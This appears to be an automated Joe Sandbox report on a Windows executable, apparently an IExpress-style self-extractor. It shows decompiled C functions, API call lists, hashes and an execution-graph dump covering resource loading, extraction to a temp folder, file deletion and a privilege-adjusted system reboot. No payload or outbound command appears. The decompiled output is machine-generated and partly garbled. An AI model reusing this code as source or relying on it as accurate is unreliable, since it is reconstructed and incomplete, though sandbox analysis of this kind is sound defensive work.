                              0x010e4855
                              0x010e4857
                              0x010e4858
                              0x010e4860
                              0x010e4865
                              0x010e486a
                              0x010e486f
                              0x00000000
                              0x010e4876
                              0x010e4831
                              0x010e4841
                              0x010e4847
                              0x010e480b
                              0x00000000
                              0x010e480b
                              0x010e47f6
                              0x010e4806
                              0x00000000

                              APIs
                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010E4E6F), ref: 010E47EA
                              • LocalAlloc.KERNEL32(00000040,?), ref: 010E4823
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010E4847
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E4851
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Local$Alloc$FreeLoadMessageString
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 359063898-305352358
                              • Opcode ID: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                              • Instruction ID: ae0e5b722709fefeb4acb3261b6cae43fb5717b90798a9eef993fb356a0b9530
                              • Opcode Fuzzy Hash: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                              • Instruction Fuzzy Hash: B21136B5700601AFE7298E26981CF7A3BDAEBC5700F04845DE9C2CB345CA3ACC06C720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E010E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                              				struct HRSRC__* _t6;
                              				void* _t21;
                              				struct HINSTANCE__* _t23;
                              				int _t24;
                              
                              				_t23 =  *0x10e9a3c; // 0x10e0000
                              				_t6 = FindResourceA(_t23, __edx, 5);
                              				if(_t6 == 0) {
                              					L6:
                              					E010E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                              					_t24 = _a16;
                              				} else {
                              					_t21 = LoadResource(_t23, _t6);
                              					if(_t21 == 0) {
                              						goto L6;
                              					} else {
                              						if(_a12 != 0) {
                              							_push(_a12);
                              						} else {
                              							_push(0);
                              						}
                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                              						FreeResource(_t21);
                              						if(_t24 == 0xffffffff) {
                              							goto L6;
                              						}
                              					}
                              				}
                              				return _t24;
                              			}







                              0x010e651f
                              0x010e652a
                              0x010e6534
                              0x010e656b
                              0x010e6577
                              0x010e657c
                              0x010e6536
                              0x010e653e
                              0x010e6542
                              0x00000000
                              0x010e6544
                              0x010e6547
                              0x010e654c
                              0x010e6549
                              0x010e6549
                              0x010e6549
                              0x010e655e
                              0x010e6560
                              0x010e6569
                              0x00000000
                              0x00000000
                              0x010e6569
                              0x010e6542
                              0x010e6587

                              APIs
                              • FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                              • LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                              • DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                              • FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              • Opcode ID: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                              • Instruction ID: 44db344cbe17339d9dcf8be21b4b6f8ae91a8989624eac15e7621805995329a7
                              • Opcode Fuzzy Hash: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                              • Instruction Fuzzy Hash: A201D473300105BFDB205A5AAC08DAB7AECEB89761F010165FA9197144DA76CD1087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3680(void* __ecx) {
                              				void* _v8;
                              				struct tagMSG _v36;
                              				int _t8;
                              				struct HWND__* _t16;
                              
                              				_v8 = __ecx;
                              				_t16 = 0;
                              				while(1) {
                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                              					if(_t8 == 0) {
                              						break;
                              					}
                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                              						continue;
                              					} else {
                              						do {
                              							if(_v36.message != 0x12) {
                              								DispatchMessageA( &_v36);
                              							} else {
                              								_t16 = 1;
                              							}
                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                              						} while (_t8 != 0);
                              						if(_t16 == 0) {
                              							continue;
                              						}
                              					}
                              					break;
                              				}
                              				return _t8;
                              			}







                              0x010e368c
                              0x010e368f
                              0x010e3691
                              0x010e369f
                              0x010e36a7
                              0x00000000
                              0x00000000
                              0x010e36ba
                              0x00000000
                              0x010e36bc
                              0x010e36bc
                              0x010e36c0
                              0x010e36cb
                              0x010e36c2
                              0x010e36c4
                              0x010e36c4
                              0x010e36da
                              0x010e36e0
                              0x010e36e6
                              0x00000000
                              0x00000000
                              0x010e36e6
                              0x00000000
                              0x010e36ba
                              0x010e36ed

                              APIs
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                              • DispatchMessageA.USER32(?), ref: 010E36CB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0
                              • Opcode ID: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                              • Instruction ID: d540ed2cb228577ffec65b8c72fe2e0a214c89ae4ff836a7235ec16d08be670f
                              • Opcode Fuzzy Hash: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                              • Instruction Fuzzy Hash: C9017176A00214ABDB304AAB5C4CEABBFFCEBC9F10F004199BA45EB184D565C540CA60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E010E65E8(char* __ecx) {
                              				char _t3;
                              				char _t10;
                              				char* _t12;
                              				char* _t14;
                              				char* _t15;
                              				CHAR* _t16;
                              
                              				_t12 = __ecx;
                              				_t15 = __ecx;
                              				_t14 =  &(__ecx[1]);
                              				_t10 = 0;
                              				do {
                              					_t3 =  *_t12;
                              					_t12 =  &(_t12[1]);
                              				} while (_t3 != 0);
                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                              				while(1) {
                              					_t16 = CharPrevA(_t15, ??);
                              					if(_t16 <= _t15) {
                              						break;
                              					}
                              					if( *_t16 == 0x5c) {
                              						L7:
                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                              							_t16 = CharNextA(_t16);
                              						}
                              						 *_t16 = _t10;
                              						_t10 = 1;
                              					} else {
                              						_push(_t16);
                              						continue;
                              					}
                              					L11:
                              					return _t10;
                              				}
                              				if( *_t16 == 0x5c) {
                              					goto L7;
                              				}
                              				goto L11;
                              			}









                              0x010e65e8
                              0x010e65ed
                              0x010e65ef
                              0x010e65f2
                              0x010e65f4
                              0x010e65f4
                              0x010e65f6
                              0x010e65f7
                              0x010e6608
                              0x010e6611
                              0x010e6618
                              0x010e661c
                              0x00000000
                              0x00000000
                              0x010e660e
                              0x010e6623
                              0x010e6625
                              0x010e663b
                              0x010e663b
                              0x010e663d
                              0x010e6641
                              0x010e6610
                              0x010e6610
                              0x00000000
                              0x010e6610
                              0x010e6644
                              0x010e6647
                              0x010e6647
                              0x010e6621
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010E2B33), ref: 010E6602
                              • CharPrevA.USER32(?,00000000), ref: 010E6612
                              • CharPrevA.USER32(?,00000000), ref: 010E6629
                              • CharNextA.USER32(00000000), ref: 010E6635
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID:
                              • API String ID: 3260447230-0
                              • Opcode ID: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                              • Instruction ID: 57f11d350ae75b048ca88217acc0318f45caee9f11807e2f91d7ff4f4e32250c
                              • Opcode Fuzzy Hash: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                              • Instruction Fuzzy Hash: ACF0F432205150AEE7330A2FAC8C8BBBFDCDB9F594F1941EFE8D587101D61B49068B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E69B0() {
                              				intOrPtr* _t4;
                              				intOrPtr* _t5;
                              				void* _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              
                              				 *0x10e81f8 = E010E6C70();
                              				__set_app_type(E010E6FBE(2));
                              				 *0x10e88a4 =  *0x10e88a4 | 0xffffffff;
                              				 *0x10e88a8 =  *0x10e88a8 | 0xffffffff;
                              				_t4 = __p__fmode();
                              				_t11 =  *0x10e8528; // 0x0
                              				 *_t4 = _t11;
                              				_t5 = __p__commode();
                              				_t12 =  *0x10e851c; // 0x0
                              				 *_t5 = _t12;
                              				_t6 = E010E7000();
                              				if( *0x10e8000 == 0) {
                              					__setusermatherr(E010E7000);
                              				}
                              				E010E71EF(_t6);
                              				return 0;
                              			}








                              0x010e69b7
                              0x010e69c2
                              0x010e69c8
                              0x010e69cf
                              0x010e69d8
                              0x010e69de
                              0x010e69e4
                              0x010e69e6
                              0x010e69ec
                              0x010e69f2
                              0x010e69f4
                              0x010e6a00
                              0x010e6a07
                              0x010e6a0d
                              0x010e6a0e
                              0x010e6a15

                              APIs
                                • Part of subcall function 010E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010E6FC5
                              • __set_app_type.MSVCRT ref: 010E69C2
                              • __p__fmode.MSVCRT ref: 010E69D8
                              • __p__commode.MSVCRT ref: 010E69E6
                              • __setusermatherr.MSVCRT ref: 010E6A07
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                              • String ID:
                              • API String ID: 1632413811-0
                              • Opcode ID: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                              • Instruction ID: 7c6d10c152326dcdace8bd71c8d3d99b823a3a198dd28e055e05585cd4c5c624
                              • Opcode Fuzzy Hash: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                              • Instruction Fuzzy Hash: DFF0DA74A04311CFC6786B3BF60D6043BE2EB18B21B10464AE4E19E2D8CF3F81408B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:26.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:969
                              Total number of Limit Nodes:42
                              execution_graph 2196 a74ca0 GlobalAlloc 2197 a76a60 2214 a77155 2197->2214 2199 a76a65 2200 a76a76 GetStartupInfoW 2199->2200 2201 a76a93 2200->2201 2202 a76aa8 2201->2202 2203 a76aaf Sleep 2201->2203 2204 a76ac7 _amsg_exit 2202->2204 2206 a76ad1 2202->2206 2203->2201 2204->2206 2205 a76b13 _initterm 2209 a76b2e __IsNonwritableInCurrentImage 2205->2209 2206->2205 2207 a76af4 2206->2207 2206->2209 2208 a76bd6 _ismbblead 2208->2209 2209->2208 2210 a76c1e 2209->2210 2213 a76bbe exit 2209->2213 2219 a72bfb GetVersion 2209->2219 2210->2207 2212 a76c27 _cexit 2210->2212 2212->2207 2213->2209 2215 a7717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 a7717a 2214->2216 2217 a771cd 2215->2217 2216->2215 2218 a771e2 2216->2218 2217->2218 2218->2199 2220 a72c50 2219->2220 2221 a72c0f 2219->2221 2236 a72caa memset memset memset 2220->2236 2221->2220 2223 a72c13 GetModuleHandleW 2221->2223 2223->2220 2224 a72c22 GetProcAddress 2223->2224 2224->2220 2233 a72c34 2224->2233 2226 a72c8e 2227 a72c97 CloseHandle 2226->2227 2228 a72c9e 2226->2228 2227->2228 2228->2209 2233->2220 2234 a72c89 2331 a71f90 2234->2331 2348 a7468f FindResourceA SizeofResource 2236->2348 2239 a72e30 2242 a744b9 20 API calls 2239->2242 2240 a72d2d CreateEventA SetEvent 2241 a7468f 7 API calls 2240->2241 2243 a72d57 2241->2243 2244 a72f06 2242->2244 2245 a72d7d 2243->2245 2246 a72d5b 2243->2246 2353 a76ce0 2244->2353 2248 a72e1f 2245->2248 2251 a7468f 7 API calls 2245->2251 2358 a744b9 2246->2358 2387 a75c9e 2248->2387 2250 a72c62 2250->2226 2277 a72f1d 2250->2277 2254 a72d9f 2251->2254 2254->2246 2256 a72da3 CreateMutexA 2254->2256 2255 a72e3a 2257 a72e43 2255->2257 2258 a72e52 FindResourceA 2255->2258 2256->2248 2259 a72dbd GetLastError 2256->2259 2413 a72390 2257->2413 2262 a72e64 LoadResource 2258->2262 2263 a72e6e 2258->2263 2259->2248 2261 a72dca 2259->2261 2265 a72dd5 2261->2265 2266 a72dea 2261->2266 2262->2263 2264 a72d6e 2263->2264 2428 a736ee GetVersionExA 2263->2428 2264->2244 2267 a744b9 20 API calls 2265->2267 2268 a744b9 20 API calls 2266->2268 2269 a72de8 2267->2269 2270 a72dff 2268->2270 2272 a72e04 CloseHandle 2269->2272 2270->2248 2270->2272 2272->2244 2278 a72f3f 2277->2278 2279 a72f6c 2277->2279 2281 a72f5f 2278->2281 2552 a751e5 2278->2552 2572 a75164 2279->2572 2705 a73a3f 2281->2705 2282 a72f71 2314 a73041 2282->2314 2587 a755a0 2282->2587 2289 a76ce0 4 API calls 2291 a72c6b 2289->2291 2290 a72f86 GetSystemDirectoryA 2292 a7658a CharPrevA 2290->2292 2318 a752b6 2291->2318 2293 a72fab LoadLibraryA 2292->2293 2294 a72ff7 FreeLibrary 2293->2294 2295 a72fc0 GetProcAddress 2293->2295 2297 a73017 SetCurrentDirectoryA 2294->2297 2298 a73006 2294->2298 2295->2294 2296 a72fd6 DecryptFileA 2295->2296 2296->2294 2308 a72ff0 2296->2308 2299 a73026 2297->2299 2300 a73054 2297->2300 2298->2297 2637 a7621e GetWindowsDirectoryA 2298->2637 2302 a744b9 20 API calls 2299->2302 2304 a73061 2300->2304 2648 a73b26 2300->2648 2307 a73037 2302->2307 2306 a7307a 2304->2306 2304->2314 2657 a7256d 2304->2657 2311 a73098 2306->2311 2668 a73ba2 2306->2668 2724 a76285 GetLastError 2307->2724 2308->2294 2311->2314 2316 a730af 2311->2316 2314->2289 2726 a74169 2316->2726 2319 a752d6 2318->2319 2327 a75316 2318->2327 2321 a75300 LocalFree LocalFree 2319->2321 2323 a752eb SetFileAttributesA DeleteFileA 2319->2323 2320 a75374 2322 a7538c 2320->2322 3059 a71fe1 2320->3059 2321->2319 2321->2327 2324 a76ce0 4 API calls 2322->2324 2323->2321 2326 a72c72 2324->2326 2326->2226 2326->2234 2327->2320 2328 a7535e SetCurrentDirectoryA 2327->2328 2329 a765e8 4 API calls 2327->2329 2330 a72390 13 API calls 2328->2330 2329->2328 2330->2320 2332 a71f9f 2331->2332 2333 a71f9a 2331->2333 2335 a71fc0 2332->2335 2336 a744b9 20 API calls 2332->2336 2340 a71fd9 2332->2340 2334 a71ea7 15 API calls 2333->2334 2334->2332 2337 a71fcf ExitWindowsEx 2335->2337 2338 a71ee2 GetCurrentProcess OpenProcessToken 2335->2338 2335->2340 2336->2335 2337->2340 2341 a71f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2338->2341 2342 a71f0e 2338->2342 2340->2226 2341->2342 2343 a71f6b ExitWindowsEx 2341->2343 2345 a744b9 20 API calls 2342->2345 2343->2342 2344 a71f1f 2343->2344 2346 a76ce0 4 API calls 2344->2346 2345->2344 2347 a71f8c 2346->2347 2347->2226 2349 a746b6 2348->2349 2350 a72d1a 2348->2350 2349->2350 2351 a746be FindResourceA LoadResource LockResource 2349->2351 2350->2239 2350->2240 2351->2350 2352 a746df memcpy_s FreeResource 2351->2352 2352->2350 2354 a76ceb 2353->2354 2355 a76ce8 2353->2355 2470 a76cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2470 2355->2250 2357 a76e26 2357->2250 2359 a744fe LoadStringA 2358->2359 2360 a7455a 2358->2360 2361 a74527 2359->2361 2362 a74562 2359->2362 2363 a76ce0 4 API calls 2360->2363 2471 a7681f 2361->2471 2368 a745c9 2362->2368 2374 a7457e 2362->2374 2366 a74689 2363->2366 2366->2264 2367 a74536 MessageBoxA 2367->2360 2370 a74607 LocalAlloc 2368->2370 2371 a745cd LocalAlloc 2368->2371 2370->2360 2382 a745c4 2370->2382 2371->2360 2375 a745f3 2371->2375 2374->2374 2377 a74596 LocalAlloc 2374->2377 2378 a7171e _vsnprintf 2375->2378 2376 a7462d MessageBeep 2379 a7681f 10 API calls 2376->2379 2377->2360 2380 a745af 2377->2380 2378->2382 2383 a7463b 2379->2383 2488 a7171e 2380->2488 2382->2376 2384 a74645 MessageBoxA LocalFree 2383->2384 2385 a767c9 EnumResourceLanguagesA 2383->2385 2384->2360 2385->2384 2393 a75e17 2387->2393 2397 a75cc3 2387->2397 2388 a75dd0 2392 a75dec GetModuleFileNameA 2388->2392 2388->2393 2389 a76ce0 4 API calls 2391 a72e2c 2389->2391 2390 a75ced CharNextA 2390->2397 2391->2239 2391->2255 2392->2393 2394 a75e0a 2392->2394 2393->2389 2498 a766c8 2394->2498 2396 a76218 2507 a76e2a 2396->2507 2397->2388 2397->2390 2397->2393 2397->2396 2400 a75e36 CharUpperA 2397->2400 2406 a75f9f CharUpperA 2397->2406 2407 a75f59 CompareStringA 2397->2407 2408 a76003 CharUpperA 2397->2408 2409 a7667f IsDBCSLeadByte CharNextA 2397->2409 2410 a75edc CharUpperA 2397->2410 2411 a760a2 CharUpperA 2397->2411 2503 a7658a 2397->2503 2400->2397 2401 a761d0 2400->2401 2402 a744b9 20 API calls 2401->2402 2403 a761e7 2402->2403 2404 a761f7 ExitProcess 2403->2404 2405 a761f0 CloseHandle 2403->2405 2405->2404 2406->2397 2407->2397 2408->2397 2409->2397 2410->2397 2411->2397 2414 a724cb 2413->2414 2417 a723b9 2413->2417 2415 a76ce0 4 API calls 2414->2415 2416 a724dc 2415->2416 2416->2264 2417->2414 2418 a723e9 FindFirstFileA 2417->2418 2418->2414 2425 a72407 2418->2425 2419 a72421 lstrcmpA 2421 a72431 lstrcmpA 2419->2421 2422 a724a9 FindNextFileA 2419->2422 2420 a72479 2423 a72488 SetFileAttributesA DeleteFileA 2420->2423 2421->2422 2421->2425 2424 a724bd FindClose RemoveDirectoryA 2422->2424 2422->2425 2423->2422 2424->2414 2425->2419 2425->2420 2425->2422 2426 a7658a CharPrevA 2425->2426 2427 a72390 5 API calls 2425->2427 2426->2425 2427->2425 2432 a73737 2428->2432 2433 a7372d 2428->2433 2429 a744b9 20 API calls 2442 a739fc 2429->2442 2430 a76ce0 4 API calls 2431 a72e92 2430->2431 2431->2244 2431->2264 2443 a718a3 2431->2443 2432->2433 2435 a738a4 2432->2435 2432->2442 2514 a728e8 2432->2514 2433->2429 2433->2442 2435->2433 2436 a739c1 MessageBeep 2435->2436 2435->2442 2437 a7681f 10 API calls 2436->2437 2438 a739ce 2437->2438 2439 a767c9 EnumResourceLanguagesA 2438->2439 2441 a739d8 MessageBoxA 2438->2441 2439->2441 2441->2442 2442->2430 2444 a718d5 2443->2444 2450 a719b8 2443->2450 2543 a717ee LoadLibraryA 2444->2543 2445 a76ce0 4 API calls 2447 a719d5 2445->2447 2447->2264 2463 a76517 FindResourceA 2447->2463 2449 a718e5 GetCurrentProcess OpenProcessToken 2449->2450 2451 a71900 GetTokenInformation 2449->2451 2450->2445 2452 a719aa CloseHandle 2451->2452 2453 a71918 GetLastError 2451->2453 2452->2450 2453->2452 2454 a71927 LocalAlloc 2453->2454 2455 a719a9 2454->2455 2456 a71938 GetTokenInformation 2454->2456 2455->2452 2457 a719a2 LocalFree 2456->2457 2458 a7194e AllocateAndInitializeSid 2456->2458 2457->2455 2458->2457 2459 a7196e 2458->2459 2460 a71999 FreeSid 2459->2460 2461 a71975 EqualSid 2459->2461 2462 a7198c 2459->2462 2460->2457 2461->2459 2461->2462 2462->2460 2464 a76536 LoadResource 2463->2464 2465 a7656b 2463->2465 2464->2465 2466 a76544 DialogBoxIndirectParamA FreeResource 2464->2466 2467 a744b9 20 API calls 2465->2467 2466->2465 2469 a7657c 2466->2469 2467->2469 2469->2264 2470->2357 2472 a76857 GetVersionExA 2471->2472 2481 a7691a 2471->2481 2474 a7687c 2472->2474 2472->2481 2473 a76ce0 4 API calls 2475 a7452c 2473->2475 2476 a768a5 GetSystemMetrics 2474->2476 2474->2481 2475->2367 2482 a767c9 2475->2482 2477 a768b5 RegOpenKeyExA 2476->2477 2476->2481 2478 a768d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 a7690c 2478->2479 2478->2481 2492 a766f9 2479->2492 2481->2473 2483 a76803 2482->2483 2484 a767e2 2482->2484 2483->2367 2496 a76793 EnumResourceLanguagesA 2484->2496 2486 a767f5 2486->2483 2497 a76793 EnumResourceLanguagesA 2486->2497 2489 a7172d 2488->2489 2490 a7173d _vsnprintf 2489->2490 2491 a7175d 2489->2491 2490->2491 2491->2382 2493 a7670f 2492->2493 2494 a76740 CharNextA 2493->2494 2495 a7674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2483 2501 a766d5 2498->2501 2499 a766f3 2499->2393 2501->2499 2502 a766e5 CharNextA 2501->2502 2510 a76648 2501->2510 2502->2501 2504 a7659b 2503->2504 2504->2504 2505 a765ab 2504->2505 2506 a765b8 CharPrevA 2504->2506 2505->2397 2506->2505 2513 a76cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a7621d 2511 a7665d IsDBCSLeadByte 2510->2511 2512 a76668 2510->2512 2511->2512 2512->2501 2513->2509 2515 a72a62 2514->2515 2519 a7290d 2514->2519 2516 a72a75 2515->2516 2517 a72a6e GlobalFree 2515->2517 2516->2435 2517->2516 2519->2515 2520 a72955 GlobalAlloc 2519->2520 2522 a72a20 GlobalUnlock 2519->2522 2523 a72a80 GlobalUnlock 2519->2523 2524 a72773 2519->2524 2520->2515 2521 a72968 GlobalLock 2520->2521 2521->2515 2521->2519 2522->2519 2523->2515 2525 a727a3 CharUpperA CharNextA CharNextA 2524->2525 2526 a728b2 2524->2526 2527 a728b7 GetSystemDirectoryA 2525->2527 2528 a727db 2525->2528 2526->2527 2531 a728bf 2527->2531 2529 a727e3 2528->2529 2530 a728a8 GetWindowsDirectoryA 2528->2530 2536 a7658a CharPrevA 2529->2536 2530->2531 2532 a728d2 2531->2532 2533 a7658a CharPrevA 2531->2533 2534 a76ce0 4 API calls 2532->2534 2533->2532 2535 a728e2 2534->2535 2535->2519 2537 a72810 RegOpenKeyExA 2536->2537 2537->2531 2538 a72837 RegQueryValueExA 2537->2538 2539 a7285c 2538->2539 2540 a7289a RegCloseKey 2538->2540 2541 a72867 ExpandEnvironmentStringsA 2539->2541 2542 a7287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 a71826 GetProcAddress 2543->2544 2545 a71890 2543->2545 2546 a71889 FreeLibrary 2544->2546 2547 a71839 AllocateAndInitializeSid 2544->2547 2548 a76ce0 4 API calls 2545->2548 2546->2545 2547->2546 2550 a7185f FreeSid 2547->2550 2549 a7189f 2548->2549 2549->2449 2549->2450 2550->2546 2553 a7468f 7 API calls 2552->2553 2554 a751f9 LocalAlloc 2553->2554 2555 a7522d 2554->2555 2556 a7520d 2554->2556 2557 a7468f 7 API calls 2555->2557 2558 a744b9 20 API calls 2556->2558 2559 a7523a 2557->2559 2560 a7521e 2558->2560 2561 a75262 lstrcmpA 2559->2561 2562 a7523e 2559->2562 2563 a76285 GetLastError 2560->2563 2565 a75272 LocalFree 2561->2565 2566 a7527e 2561->2566 2564 a744b9 20 API calls 2562->2564 2571 a75223 2563->2571 2568 a7524f LocalFree 2564->2568 2567 a72f4d 2565->2567 2569 a744b9 20 API calls 2566->2569 2567->2279 2567->2281 2567->2314 2568->2567 2570 a75290 LocalFree 2569->2570 2570->2571 2571->2567 2573 a7468f 7 API calls 2572->2573 2574 a75175 2573->2574 2575 a7517a 2574->2575 2576 a751af 2574->2576 2577 a744b9 20 API calls 2575->2577 2578 a7468f 7 API calls 2576->2578 2580 a7518d 2577->2580 2579 a751c0 2578->2579 2739 a76298 2579->2739 2580->2282 2584 a751e1 2584->2282 2585 a751ce 2586 a744b9 20 API calls 2585->2586 2586->2580 2588 a7468f 7 API calls 2587->2588 2589 a755c7 LocalAlloc 2588->2589 2590 a755fd 2589->2590 2591 a755db 2589->2591 2593 a7468f 7 API calls 2590->2593 2592 a744b9 20 API calls 2591->2592 2594 a755ec 2592->2594 2595 a7560a 2593->2595 2596 a76285 GetLastError 2594->2596 2597 a75632 lstrcmpA 2595->2597 2598 a7560e 2595->2598 2601 a755f1 2596->2601 2599 a75645 2597->2599 2600 a7564b LocalFree 2597->2600 2602 a744b9 20 API calls 2598->2602 2599->2600 2603 a75696 2600->2603 2604 a7565b 2600->2604 2625 a755f6 2601->2625 2605 a7561f LocalFree 2602->2605 2606 a7589f 2603->2606 2609 a756ae GetTempPathA 2603->2609 2610 a75467 49 API calls 2604->2610 2605->2625 2607 a76517 24 API calls 2606->2607 2607->2625 2608 a76ce0 4 API calls 2611 a72f7e 2608->2611 2612 a756eb 2609->2612 2613 a756c3 2609->2613 2615 a75678 2610->2615 2611->2290 2611->2314 2619 a75717 GetDriveTypeA 2612->2619 2620 a7586c GetWindowsDirectoryA 2612->2620 2612->2625 2751 a75467 2613->2751 2617 a75680 2615->2617 2615->2625 2618 a744b9 20 API calls 2617->2618 2618->2601 2623 a75730 GetFileAttributesA 2619->2623 2635 a7572b 2619->2635 2785 a7597d GetCurrentDirectoryA 